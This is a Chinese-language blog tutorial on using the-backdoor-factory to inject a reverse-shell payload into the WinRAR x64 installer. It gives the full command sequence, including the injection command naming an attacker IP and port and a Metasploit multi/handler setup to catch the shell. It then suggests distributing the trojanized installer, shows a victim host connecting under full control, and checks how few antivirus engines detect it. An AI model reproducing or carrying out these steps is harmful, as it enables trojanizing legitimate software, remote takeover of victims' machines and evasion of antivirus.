天天看点

后门

我们的网络不安全

https://www.youtube.com/watch?v=nJF9OTscFiQ

这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。

在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。

注入

1.下载程序

git clone https://github.com/secretsquirrel/the-backdoor-factory.git
           

2.安装

sudo chmod +x ./install.sh
           

3.运行

sudo ./backdoor.py
           

4.选择目标文件

本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe

之后将在此程序中注入后门

执行

./babackdoor.py -f winrar-x64-561.exe -S

可以看到此程序支持代码注入

./babackdoor.py -f winrar-x64-561.exe -s show

查看支持哪几种注入方式

5.开始注入

./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

reverse_shell_tcp_inline 注入方式

172.17.170.38 攻击者ip,之后受害者主机来访问该ip

1234 攻击者端口,之后受害者主机来访问该端口

选择注入的位置:

都可以,这里我们选择2

完成。可以在指定目录下找到该文件。

到这里就注入完成了。

控制

服务器等待中招的pc连接。

设置服务器。打开kali linux系统。

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit
           

将注入好的程序散发出去。如果有计算机不幸中招。

当有中招的pc代开注入后门的程序后,服务器端会有响应。

可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。

可以看到被控制的主机信息。(编码格式可能不对,出现乱码)

测试

对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。

对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。

实际上,该程序官网下载的源文件也可能会被误杀

杀毒可以参考网站:

http://www.virscan.org/language/zh-cn/

https://www.virustotal.com/zh-cn/

参考

利用BDF向EXE文件植入后门

Backdoor factory – How to inject shell-code into windows application

Kali Linux 渗透测试 博客记录